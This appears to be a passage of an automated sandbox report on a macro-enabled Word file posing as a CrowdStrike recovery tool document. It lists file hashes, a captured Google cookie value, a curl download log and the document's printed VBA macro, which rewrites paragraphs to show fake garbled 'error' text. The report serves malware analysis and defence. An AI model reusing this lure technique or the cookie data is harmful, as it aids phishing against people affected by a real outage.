XSODDRKSUOGIMMNADLIRGHDFDTKKQAFWAYTUNQJNECGAKAPULJFXENSHPMQGUWBJJTPVTDADKCEVKGQOXSCANLNQNJAWKDBVBIWICEASXDEHDCNCUIOBUKTINVKEPNITJZRLWNHBVANB
                              Process:C:\Windows\System32\rundll32.exe
                              File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                              Category:dropped
                              Size (bytes):5242880
                              Entropy (8bit):0.0357803477377646
                              Encrypted:false
                              SSDEEP:192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
                              MD5:76D181A334D47872CD2E37135CC83F95
                              SHA1:B563370B023073CE6E0F63671AA4AF169ABBF4E1
                              SHA-256:52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
                              SHA-512:23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
                              Malicious:false
                              Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\System32\rundll32.exe
                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                              Category:dropped
                              Size (bytes):98304
                              Entropy (8bit):0.08235737944063153
                              Encrypted:false
                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                              Malicious:false
                              Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\System32\rundll32.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):32768
                              Entropy (8bit):0.017262956703125623
                              Encrypted:false
                              SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                              MD5:B7C14EC6110FA820CA6B65F5AEC85911
                              SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                              SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                              SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                              Malicious:false
                              Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\System32\rundll32.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):357
                              Entropy (8bit):5.908439824664254
                              Encrypted:false
                              SSDEEP:6:sj+GbcVfMYSaSMDuyXdt3RdVAkEhW/UPmTU4OvOrGISa37rTVLP7kj+Gi3/VfXWT:DpaYSalDuyXv3RdJqmOvO6C3rVLP7bBg
                              MD5:98AC3911295CC589DDF1981CCA1EE90B
                              SHA1:3F987C9A967290457877236216ECD8A0A69618C9
                              SHA-256:FFB93F6612A7B2E31A5BD59D5B54CB41181C01D72823B3916BEEAE8B8F642714
                              SHA-512:D682AA4855CA4AD470B48D520FA43D6DD5F946DEBB6616A03CFA5670EB2ED8A5892E54A88D168E7AD15373F03B5AD086C9160FBA37544FF1D4F88127BBD700DF
                              Malicious:false
                              Preview:HostKey: .google.com..Name: NID..Value: 511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg..Path: /..ExpireUTC: 13356771602392648....HostKey: .google.com..Name: 1P_JAR..Value: 2023-10-05-06..Path: /..ExpireUTC: 13343552440345167....
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                              Category:downloaded
                              Size (bytes):25518
                              Entropy (8bit):7.981260120775725
                              Encrypted:false
                              SSDEEP:768:OxBz7hEdHHosjJeGrv2gsHrSe1fLKnHfzz:OxBz7YosjMGOgsJ1jyn
                              MD5:9C4B364491E6AF11CC33DF28C33C4216
                              SHA1:4A0F078995949E9FC29BCE9437EB902BB32D462B
                              SHA-256:30C65E1E9879FE37A4A18DC8B4887C4DFE3BA29E89885D9FE61365869E93CFFD
                              SHA-512:AD395F489DF5C4388221734755AB7D7FDA6DB902F3E56A35B29FFC15D3D778298BD6CD24FAF3AB9CC53BDB1099617A72C95F3759DB4393875E14E3EC9A324279
                              Malicious:false
                              URL:https://download.microsoft.com/download/8/e/1/8e189885-12fe-4ebe-895d-b2d5a08aae65/MsftRecoveryToolForCSv2.zip
                              Preview:PK........4P.X....(..Xi......ADKLicenseAgreement.rtf.}ko.H..~6.....@W.Tj.l.].X.mU..].G....}.......a........|.R.=.;..........q".t.X..2.....~....V..lz+.l.....p.w....?V.......V..vV.........x.v..W../^.2.{..tqPz.....g6....4..4`....s.....X....`.{...[m}...j.D.W.jpv.......04..g..?...0..r..wV...=.../Ah.......!...~..........vk...e....OS......{..............T..Vl..^..pU.._.U.G..UO..6$.p..8......8Tn..v..._..z...P.:.w.Ug6.......L..=q..S-.#.ULe./M/rC.).V.=..{P}....a...G.w.U.}..~.]....m>rk.c.^.............4..}(.V{.@% ......4.5...A..}.]...w....|...fv5.]L.r:..@..'_f..w_.l.XL..O..%..^......W...l..L.......H.j.`..B.z.c........}o.c...]...k.....m..d.'6..[......'q..`....v..{..|q..<..........._..F|t.zF...=!..r4......O../..q.\.c.....R~._....'...<cp..M._.._..#kDZ........~y...../..a0.....^.<8....&.pv...F....b|.i....\.GM...]..........b.0G....f.&...E.V.a.0...h.........W...2JP*I.w~.7...I}.....W.A.G..f.E.s02E.U......:..{.a.\......).eQ..^K...R..E...*.... ..C.@r....UO
                              Process:C:\Users\user\AppData\Local\Temp\curl.exe
                              File Type:ASCII text, with CR, LF line terminators
                              Category:dropped
                              Size (bytes):557
                              Entropy (8bit):3.4772964179639105
                              Encrypted:false
                              SSDEEP:12:Vz6ykymUexb1U9cRlMHYy+rMvcRYcVYgkA/n:HkyH+bJR2aRYkYpA/n
                              MD5:F7506CC442B5F04348E69DD54081AB6E
                              SHA1:7FAF8D6C090580FA7C94761A1F28E08FDEB51C8F
                              SHA-256:95235D4766480A2F0970E7895E2F0B952C46AEFDF41B56CC3856FB90B530355F
                              SHA-512:A5F835BC62DEDC379DB33B3BF6501A9BAA4322DD16FFA4CF3B0B914376FB60513493885D6636DF6F9F1F5E6435D2ACCB76C2C83631B49AC614A2DB814C64567F
                              Malicious:false
                              Preview: % Total % Received % Xferd Average Speed Time Time Time Current.. Dload Upload Total Spent Left Speed... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 1896k 0 1236 0 0 1323 0 0:24:27 --:--:-- 0:24:27 1323. 5 1896k 5 99948 0 0 66601 0 0:00:29 0:00:01 0:00:28 66587. 48 1896k 48 928k 0 0 370k 0 0:00:05 0:00:02 0:00:03 370k.100 1896k 100 1896k 0 0 587k 0 0:00:03 0:00:03 --:--:-- 587k..
                              File type:Microsoft Word 2007+
                              Entropy (8bit):7.938940748289286
                              TrID:
                              • Word Microsoft Office Open XML Format document with Macro (52004/1) 37.96%
                              • Word Microsoft Office Open XML Format document (49504/1) 36.13%
                              • Word Microsoft Office Open XML Format document (27504/1) 20.07%
                              • ZIP compressed archive (8000/1) 5.84%
                              File name:New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
                              File size:310'160 bytes
                              MD5:dd2100dfa067caae416b885637adc4ef
                              SHA1:499f8881f4927e7b4a1a0448f62c60741ea6d44b
                              SHA256:803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61
                              SHA512:809a6c7a3d83cc9b025a3109778be1d92db509d12202a30ecb31b8c8fbaeae2a50732e36d41b065b10ab64d04990e46173e09e01799bb54f8a93e725e111deda
                              SSDEEP:6144:LkNC0FaiQjxrRbX1o/EUk1DPFVpigBHbP4Z4IU1vmR8:LkNCcC6cf1xVpJNP0QNs8
                              TLSH:1664E12B7D13A023F52BD6349E903E6C72026111A3935374B9286B7FF26D14F9D8E54B
                              File Content Preview:PK..........!..am.............[Content_Types].xml ...(.........................................................................................................................................................................................................
                              Icon Hash:1d35646ca6a49919
                              Document Type:OpenXML
                              Number of OLE Files:1
                              Has Summary Info:
                              Application Name:
                              Encrypted Document:False
                              Contains Word Document Stream:True
                              Contains Workbook/Book Stream:False
                              Contains PowerPoint Document Stream:False
                              Contains Visio Document Stream:False
                              Contains ObjectPool Stream:False
                              Flash Objects Count:0
                              Contains VBA Macros:True
                              Author:Le Nho Thanh
                              Template:Normal.dotm
                              Last Saved By:David
                              Revion Number:3
                              Total Edit Time:4
                              Create Time:2024-07-19T10:29:00Z
                              Last Saved Time:2024-07-22T09:13:00Z
                              Number of Pages:9
                              Number of Words:2526
                              Number of Characters:14404
                              Creating Application:Microsoft Office Word
                              Security:0
                              Number of Lines:120
                              Number of Paragraphs:33
                              Thumbnail Scaling Desired:false
                              Company:Microsoft
                              Contains Dirty Links:false
                              Shared Document:false
                              Changed Hyperlinks:false
                              Application Version:16.0000
                              General
                              Stream Path:VBA/ThisDocument
                              VBA File Name:ThisDocument.cls
                              Stream Size:27601
                              Data ASCII:. . . . . . . . . t . . . . . . b . . . . . . . . . . . ] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . $ X . E - . B / . 8 [ . a i s . B e 2 . . . . . . . . . . . . . . . . . . . . Z . L Z . i F Z Z g 6 . . . . . . . . . . . . . . . . . . . . . . x . . . . Z . L Z . i F Z Z g 6 $ X . E - . B / . 8 [ . . . . . M E . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . . S " . . . . S . . . . . S " . . . . . < 2 . . . . . > " . . . . . < X . . . . . . . . . . . . . . . . . . L . . . .
                              Data Raw:01 16 03 00 04 00 01 00 00 74 0b 00 00 e4 00 00 00 62 02 00 00 02 0c 00 00 10 0c 00 00 e0 5d 00 00 04 00 00 00 01 00 00 00 97 d9 f8 db 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 24 58 0c 45 2d c6 bb 42 af 2f 07 e1 38 5b 0b 81 c3 61 69 73 c0 cd b3 42 91 9f a4 ef 65 97 32 fe 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Attribute VB_Name = "ThisDocument"
                              Attribute VB_Base = "1Normal.ThisDocument"
                              Attribute VB_GlobalNameSpace = False
                              Attribute VB_Creatable = False
                              Attribute VB_PredeclaredId = True
                              Attribute VB_Exposed = True
                              Attribute VB_TemplateDerived = True
                              Attribute VB_Customizable = True
                              ' Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr)
                              ' Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
                              
                              ' Sub ChangeText()
                              '     ActiveDocument.Words(19).Text = "The "
                              ' End Sub
                              
                              Sub DeleteText()
                                  ' Dim rngFirstParagraph As Range
                                  
                                  ' Set rngFirstParagraph = ActiveDocument.Paragraphs(4).Range
                                  ' With rngFirstParagraph
                                  ' .Delete
                                  ' .InsertAfter Text:="New text"
                                  ' .InsertParagraphAfter
                                  ' End With
                              
                                  Set rngFirstParagraph = ActiveDocument.Paragraphs(4).Range
                                  With rngFirstParagraph
                                  .Delete
                                  .InsertAfter Text:="Fourth paragraph displayed " + Chr(34)
                                  .InsertParagraphAfter
                                  End With
                              
                                  Set rngFirstParagraph = ActiveDocument.Paragraphs(5).Range
                                  With rngFirstParagraph
                                  .Delete
                                  .InsertAfter Text:="Fifth paragraph displayed"
                                  .InsertParagraphAfter
                                  End With
                              
                                  Set rngFirstParagraph = ActiveDocument.Paragraphs(6).Range
                                  With rngFirstParagraph
                                  .Delete
                                  .InsertAfter Text:="Sixth paragraph displayed"
                                  .InsertParagraphAfter
                                  End With
                              
                                  Set rngFirstParagraph = ActiveDocument.Paragraphs(7).Range
                                  With rngFirstParagraph
                                  .Delete
                                  .InsertAfter Text:="Seventh paragraph displayed"
                                  .InsertParagraphAfter
                                  End With
                              
                                  For i = 1 To ActiveDocument.Paragraphs.Count
                                      ' ActiveDocument.Paragraphs(i).Style = wdStyleNormal
                                      Set myRange = ActiveDocument.Paragraphs(i).Range
                                      With myRange.Font
                                      ' .Bold = True
                                      .Name = "Times New Roman"
                                      .Size = 14
                                      End With
                                  Next i
                              End Sub
                              
                              Sub ShowErrorText()
                                  Dim rngFirstParagraph As Range
                                  
                                  Set rngFirstParagraph = ActiveDocument.Paragraphs(4).Range
                                  With rngFirstParagraph
                                  .Delete
                                  .InsertAfter Text:=ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3)
                                  .InsertParagraphAfter
                              
                                  .InsertAfter Text:=ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3)
                                  .InsertParagraphAfter
                              
                                  .InsertAfter Text:=ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3)
                                  .InsertParagraphAfter
                              
                                  .InsertAfter Text:=ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3)
                              
                                  .InsertAfter Text:=ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " 